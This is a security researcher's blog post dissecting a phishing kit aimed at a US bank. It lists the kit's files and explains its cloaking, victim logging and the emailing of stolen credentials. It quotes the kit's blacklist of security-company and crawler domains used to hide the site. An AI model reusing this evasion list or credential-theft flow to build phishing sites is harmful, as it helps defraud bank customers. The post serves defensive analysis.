There have been plenty of articles describing the structure of phishing emails, and how to spot them. However, less explored, are phishing websites - what they are, how they are used, and how users can protect themselves. We'll take a deep dive into a particular phishing website and the methods used in the author's attempt to avoid detection. While reading through my Twitter feed, I noticed a tweet from @WifiRumHam discussing a zip file of phishing kits he discovered that is hosted on a compromised web server. He pointed me to a 66 MB file named luis-debug.zip. The zip file has five directories that are each unique to the target site being phished. I checked the source code in the first directory. It has code that targets a bank popular in the southern and midwestern states. I've blurred the images, as this is an ongoing investigation.
$ ls -l
drwxr-xr-x 3 www-data www-data 4096 Sep 13 10:39 55450bcff5cf109349f7a22507e8cfed
-rw-r--r-- 1 www-data www-data 2644 Dec 3 2014 blocker.php
drwxr-xr-x 3 www-data www-data 4096 Sep 22 2015 home
-rw-r--r-- 1 www-data www-data 718 Aug 20 16:18 index.php
-rw-r--r-- 1 www-data www-data 234 Sep 13 10:39 vu.txt
Figure 1. A listing of the bank malware phishing directory.
The code in index.php includes the code in the file blocker.php that checks that the victim connecting to it does not match certain criteria. The criteria are that the victim isn't a bot, or security company that might report the phishing site. Instead, blocker.php uses a blacklist to block out domains and IP addresses for Internet security companies, like Phishtank and Cyveillance. The antibots.php file in the below file listing implements this same bot thwarting functionality for the /home and md5sum directories. They do this by matching the connecting client's hostname or IP address with a blacklist of IP addresses, domains, and user-agent strings to those of popular web crawlers and security companies. The code snippet below is a list of strings that will be matched against the connecting client's domain. A match against any indicators in the blacklist returns a 404 page.
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
The code in index.php then generates a md5sum of the current time which then is used to create a unique directory that copies into a "home" directory. The last step is a redirect to this new unique directory after the code in index.php logs the victims IP address in the file vu.txt. The new unique md5sum directory then has a copy of the contents in the home directory.
$ ls -l 55450bcff5cf109349f7a22507e8cfed
-rw-r--r-- 1 www-data www-data 1536 Dec 22 2017 action.php
-rw-r--r-- 1 www-data www-data 9791 Jun 26 2015 anon.js
-rw-r--r-- 1 www-data www-data 2124 Jan 9 2015 antibots.php
-rw-r--r-- 1 www-data www-data 17859 Nov 18 2015 confirm.php
-rw-r--r-- 1 www-data www-data 10013 Nov 5 2015 encriptar.php
-rw-r--r-- 1 www-data www-data 296 Sep 20 2015 Finish.php
drwxr-xr-x 2 www-data www-data 4096 Sep 22 2015 images
-rw-r--r-- 1 www-data www-data 6502 Nov 18 2015 index.php
-rw-r--r-- 1 www-data www-data 2180 Dec 22 2017 mailer.php
Figure 2. A listing of the bank malware md5sum directory.
The victim is directed to the phishing site in their browser, shown in figure 4, instead of the legitimate site.
Figure 4. The webpage decrypted by the browser.
The code used to implement the AES encryption appears to have been copied, using these pages as these original sources:
Figure 5. The second form collecting more of the victim's information.
The victim is then redirected to the legitimate banking site, as if no nefarious actions have happened. The victim's credentials and personal information captured by the phishing site are then emailed out by mailer.php to the attacker's gmail.com account.
I believe that with the continued success of these phishing campaigns, the software being used will become more streamlined and sophisticated. Phishing attacks will be more difficult to detect by enterprise security applications as cybercriminals find new ways to obfuscate their activities. I expect that highly customizable software kits that will allow even the most novice cybercriminals to launch their own campaigns will become more prevalent. With the combination of homoglyphs, tricking the eye, and the obfuscation methods bypassing network monitoring that I have described above, phishing emails are getting harder and harder to detect by individuals and enterprise security systems alike.